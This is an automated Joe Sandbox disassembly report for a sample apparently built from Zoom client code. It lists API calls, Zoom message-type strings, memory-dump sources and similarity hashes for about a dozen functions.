                • Instruction Fuzzy Hash: A341E435E007049BCF14EFA4C986AEDB7B4AF44309F044128E812B7381DF709A4ADBB9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C96A84
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C776BB), ref: 00C96A98
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.wallpaper.download_result,00000044,00C776BB), ref: 00C96ACA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C96B07
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.wallpaper.download_result,?,-00000004), ref: 00C96B39
                • EnterCriticalSection.KERNEL32(00C776BB), ref: 00C96BBB
                • LeaveCriticalSection.KERNEL32(00C776BB,?), ref: 00C96BD8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C96BEB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.meeting.wallpaper.download_result$error$status$type$wallpaper_id
                • API String ID: 1443623190-110998456
                • Opcode ID: 84d13cf2fa69ceb7d1d00d771ee09b48caa0142f9f7e896ffc9e4fdde9a2bf15
                • Instruction ID: 1af391dcc4c90f0e657b3244fef7d0da4611f0463b26991be9418fca6cc0678f
                • Opcode Fuzzy Hash: 84d13cf2fa69ceb7d1d00d771ee09b48caa0142f9f7e896ffc9e4fdde9a2bf15
                • Instruction Fuzzy Hash: 73410475E006089BCF15EFA4D9496DDB7B5AF04304F044128E812E73D1EF709B4AEBA5
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90C63
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7023B), ref: 00C90C77
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,00000044,00C7023B), ref: 00C90CA9
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C90CE6
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,?,-00000004), ref: 00C90D18
                • EnterCriticalSection.KERNEL32(00C7023B), ref: 00C90D9A
                • LeaveCriticalSection.KERNEL32(00C7023B,?), ref: 00C90DB7
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C90DCA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.pt.notify.zpns.meeting.start$meetingId$meetingNumber$originalMeetingNumber$strType
                • API String ID: 1443623190-116605177
                • Opcode ID: cf6ab81ae45eb69ec26f7a124966ba5d15ecd1c30e984f7514e64727d955239d
                • Instruction ID: b00f046496989a5b3aa6315893a72d825bd99b6658bbbe3935ff07e892138c94
                • Opcode Fuzzy Hash: cf6ab81ae45eb69ec26f7a124966ba5d15ecd1c30e984f7514e64727d955239d
                • Instruction Fuzzy Hash: 6741D375E013189FCF14EBA4C8496EDB770AF45305F144128EC12AB391DF70AA8ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8EDDB
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6EC7B), ref: 00C8EDEF
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,00000044,00C6EC7B), ref: 00C8EE21
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8EE5E
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,?,-00000004), ref: 00C8EE90
                • EnterCriticalSection.KERNEL32(00C6EC7B), ref: 00C8EF12
                • LeaveCriticalSection.KERNEL32(00C6EC7B,?), ref: 00C8EF2F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C8EF42
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response$deviceID$deviceType$result
                • API String ID: 1443623190-140503531
                • Opcode ID: 0a42cfcd485ac907270d6a7bde5af2706a301cb8f19fa6ec61dcc0ab918c0084
                • Instruction ID: a037b363e1b2034bed68d30bf4e1ae191dc7b1031437d57d48f7e969ec54a65b
                • Opcode Fuzzy Hash: 0a42cfcd485ac907270d6a7bde5af2706a301cb8f19fa6ec61dcc0ab918c0084
                • Instruction Fuzzy Hash: 3341F274E007199BCF14EFA4C8466DDB7B0AF54309F044118EC12AB391DF709A8ADB69
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: _free$Info
                • String ID:
                • API String ID: 2509303402-0
                • Opcode ID: 6239bda1bcb47b855a814404d348089f81bea5dad5aa0acab6eeca634e8dbac9
                • Instruction ID: d349b82b0c285d06a3d5a6db97d3640b4c0415526b68e3a02864e0b4d9495fb8
                • Opcode Fuzzy Hash: 6239bda1bcb47b855a814404d348089f81bea5dad5aa0acab6eeca634e8dbac9
                • Instruction Fuzzy Hash: 49D1A0B19003499FDB51CF64C881BFEFBF5BF08300F144069EA99A7292D771A945DB62
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE2220
                  • Part of subcall function 00CDC00B: GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CDCE9E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,80004005,?,?,?,80070057,?,00CDCCE1,00000000,?,?,80070057,00000000), ref: 00CDCEB4
                  • Part of subcall function 00CE1DD5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(version.dll,00000000,00000800,?,?,00CE2245,00000000,00000014,00CDE0D1,?,?,?,00000028,00CDCA03,?,?), ref: 00CE1DF6
                  • Part of subcall function 00CE1DD5: SetLastError.KERNEL32(00000078,?,?,00CE2245,00000000,00000014,00CDE0D1,?,?,?,00000028,00CDCA03,?,?,?,?), ref: 00CE1E14
                • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeW), ref: 00CE2255
                • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoW), ref: 00CE2264
                • GetProcAddress.KERNEL32(00000000,VerQueryValueW), ref: 00CE2272
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?,?,?), ref: 00CE229D
                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?,?,?), ref: 00CE22AB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000001,00000000,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?), ref: 00CE22C2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00D35050,00000000,?,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?), ref: 00CE22E9
                • GlobalFree.KERNEL32(00000000), ref: 00CE231A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@State@Unlock@$AddressProc$Global$AllocErrorFreeH_prolog3HeapLastProcess
                • String ID: %u.%u.%u.%u$GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW
                • API String ID: 3352019735-4018623845
                • Opcode ID: 10cb8de4f028943ad9be902b78904dbcf3ce2529c516e3f92d791b34abf3ee7d
                • Instruction ID: 7818f859c0b21b25a70f2dfecea9666d4925e62ea2890743d551b4242c33e909
                • Opcode Fuzzy Hash: 10cb8de4f028943ad9be902b78904dbcf3ce2529c516e3f92d791b34abf3ee7d
                • Instruction Fuzzy Hash: 3A316A7590025AABCB11AFA5CC45BFE77B9BF08704F100419BA12A7291DF789E06DBB0
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAE4CA
                • ??0StringPiece@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(UNKNOWN-FILE,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE4EE
                  • Part of subcall function 00C59F30: __EH_prolog3_catch.LIBCMT ref: 00C59F37
                • GetTickCount.KERNEL32 ref: 00CAE6C7
                  • Part of subcall function 00CAEB10: __EH_prolog3_catch.LIBCMT ref: 00CAEB17
                  • Part of subcall function 00CAEB10: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00000002,00004000,?,?,?,?,0000002C,00CAE6D7,00000000,00000000,?,?,000000C4), ref: 00CAEB94
                  • Part of subcall function 00CA21D0: __EH_prolog3_catch.LIBCMT ref: 00CA21D7
                • GetCurrentProcessId.KERNEL32(?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE518
                  • Part of subcall function 00C52FC0: __EH_prolog3_catch.LIBCMT ref: 00C52FC7
                  • Part of subcall function 00C52FC0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000028,00C64738), ref: 00C53042
                  • Part of subcall function 00C5A0A6: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00000000,?,00C64731), ref: 00C5A0BC
                • GetCurrentThreadId.KERNEL32 ref: 00CAE538
                • ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE579
                • _strrchr.LIBCMT ref: 00CAE712
                • _strrchr.LIBCMT ref: 00CAE720
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000,00000001,00000002,?,?,00000000,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE795
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$H_prolog3_catchState@Unlock@$Current_strrchr$CountExplode@Exploded@12@@H_prolog3_LocalPiece@ProcessStringThreadTickTime@
                • String ID: )] $UNKNOWN-FILE$VERBOSE
                • API String ID: 2999954814-3026634520
                • Opcode ID: 3b3c86148024168acbc52c2174eae718b8889841e37972f323b70350ae4b253e
                • Instruction ID: 2eab097a7ecbf65097a40065a7823c19bdb841730c9c31ca52fe58f0a2fda6d3
                • Opcode Fuzzy Hash: 3b3c86148024168acbc52c2174eae718b8889841e37972f323b70350ae4b253e
                • Instruction Fuzzy Hash: FF91CF31A00214ABCF18ABF4E856B9E77F6AF49304F04452DF506EB386DE349D89DB58
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8EAC7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C8EAE7
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName), ref: 00C8EB15
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice), ref: 00C8EB52
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID), ref: 00C8EB82
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request), ref: 00C8EC12
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice), ref: 00C8EC2F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType), ref: 00C8EC42
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: channelName$deviceID$deviceType$signalType
                • API String ID: 1443623190-2335052125
                • Opcode ID: 8fb2a1ea71c4441f791dbea3fc7d44fec7991b5ae94b5dfaa37cecd7340692c8
                • Instruction ID: 4f7cfa346527ffd10c1360b5eeb6df88eae2b1c5ac55df8c4d1c28ee76657250
                • Opcode Fuzzy Hash: 8fb2a1ea71c4441f791dbea3fc7d44fec7991b5ae94b5dfaa37cecd7340692c8
                • Instruction Fuzzy Hash: C641C075E003189BCF15EFA4C9456DDB7B4AF54309F048118EC12AB391DF70DA8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C960A7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76DB6), ref: 00C960BB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,00000044), ref: 00C960ED
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9612A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,?), ref: 00C9615C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C961CE
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C961EB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C961FE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.conf.start.download.component$componentType$isForce$requestID
                • API String ID: 1443623190-4212277253
                • Opcode ID: 953104545100a554c0c3cbfdcebd99d719110a08995e733928d5b4ce52d6db69
                • Instruction ID: dc3910d2b56008aba656cc5ba25ff0aa80a0b1ee76ead4caee86f48b6a2cd23f
                • Opcode Fuzzy Hash: 953104545100a554c0c3cbfdcebd99d719110a08995e733928d5b4ce52d6db69
                • Instruction Fuzzy Hash: A941C174E007199BCF14EFA4D9496DDB7B0AF44315F044128EC12A73D2DF709A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92078
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71406), ref: 00C9208C
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.dc.doc2img.convert.finish,00000044), ref: 00C920BE
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C920FB
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.dc.doc2img.convert.finish,?), ref: 00C9212D
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9219F
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C921BC
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C921CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: ConvertContext$PageNumSuccess$RetCode$com.zoom.app.dc.doc2img.convert.finish
                • API String ID: 1443623190-1549264759
                • Opcode ID: 780b3947ce7bae5a23883634a71b30b1086261e19c9973013a834d713d801d37
                • Instruction ID: e39bb961db0fe10c047608898ffbdf95214a9d2c90ad892d47b137486ba5536a
                • Opcode Fuzzy Hash: 780b3947ce7bae5a23883634a71b30b1086261e19c9973013a834d713d801d37
                • Instruction Fuzzy Hash: AE41A079E00708ABCF14EFA4D8496DDBBB5AF44315F044118E812B7391DF709E8ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C96219
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76F86), ref: 00C9622D
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.download_result,00000044), ref: 00C9625F
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9629C
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.download_result,?), ref: 00C962CE
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C96340
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C9635D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C96370
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.notify.component.download_result$componentType$reason$success
                • API String ID: 1443623190-3513881105
                • Opcode ID: 812546c4a3920a7e0c29d29c7b1fa7506f56f1848d19c5a38deb533fa49fb080
                • Instruction ID: 15992f595f8a2bc44ace37ce97855a060261b6105d2e809244134cc55a55a03a
                • Opcode Fuzzy Hash: 812546c4a3920a7e0c29d29c7b1fa7506f56f1848d19c5a38deb533fa49fb080
                • Instruction Fuzzy Hash: 7841C074D007089BCF14EFA4D84A6DDB7B0BF48315F044129E812A73D1DF709A8ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92406
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71A06), ref: 00C9241A
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.vdi.plugin.info,00000044), ref: 00C9244C
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C92489
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.vdi.plugin.info,?), ref: 00C924BB
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9252D
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C9254A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C9255D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Status$TroubleCode$Version$com.zoom.app.vdi.plugin.info
                • API String ID: 1443623190-2994386332
                • Opcode ID: 8027d505ef6c7b37de57c633af14c582282165348136c1003e446140d5b71b0f
                • Instruction ID: 85fdc66ff0f936ec3f4c94a1f6f50c4fb0a4aee4511b4883d20257dce6a7a842
                • Opcode Fuzzy Hash: 8027d505ef6c7b37de57c633af14c582282165348136c1003e446140d5b71b0f
                • Instruction Fuzzy Hash: F241C375D00308ABCF14EFA4D859ADDB7B4AF48315F044118E812A7391DF70DB8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E397
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6DF46), ref: 00C8E3AB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.switch.call.to.carrier.response,00000044), ref: 00C8E3DD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8E41A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.switch.call.to.carrier.response,?), ref: 00C8E44C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C8E4BE
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8E4DB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C8E4EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: CallID$ErrorCode$Result$com.zoom.app.assistant.sip.switch.call.to.carrier.response
                • API String ID: 1443623190-2471108270
                • Opcode ID: a5672747d9b416e69a01abd67de28251a2867774a7f96c291d78acbb1a85949c
                • Instruction ID: 47477c406093de29617ebbaf21490f8362f03cb52f12e1b43db63e55d6c9b761
                • Opcode Fuzzy Hash: a5672747d9b416e69a01abd67de28251a2867774a7f96c291d78acbb1a85949c
                • Instruction Fuzzy Hash: 30410535E003059FCF24EFA4C9456DDBBB4AF84319F048118F826A7381DF709A8ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90754
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FCD6), ref: 00C90768
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.request,00000044), ref: 00C9079A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C907D7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.request,?), ref: 00C90809
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9087B
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C90898
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C908AB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.request$signalType$sourceType$userID
                • API String ID: 1443623190-3591679833
                • Opcode ID: 39cd71fedc497e9576488d7fbe52dcc895449bb85e8c11050c52e3b338e11b59
                • Instruction ID: 5c3e5b010f905f41a05b3a305b5c54e4ab5413b10a86752721a62ba9fb07f79f
                • Opcode Fuzzy Hash: 39cd71fedc497e9576488d7fbe52dcc895449bb85e8c11050c52e3b338e11b59
                • Instruction Fuzzy Hash: 8741D275E007049FCF14EFA4C84A6DDB7B4AF44315F144128E812A73D1DF709A8AEBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8675E
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68906), ref: 00C86772
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,00000044), ref: 00C867A4
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C867E1
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,?), ref: 00C86813
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C86885
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C868A2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C868B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
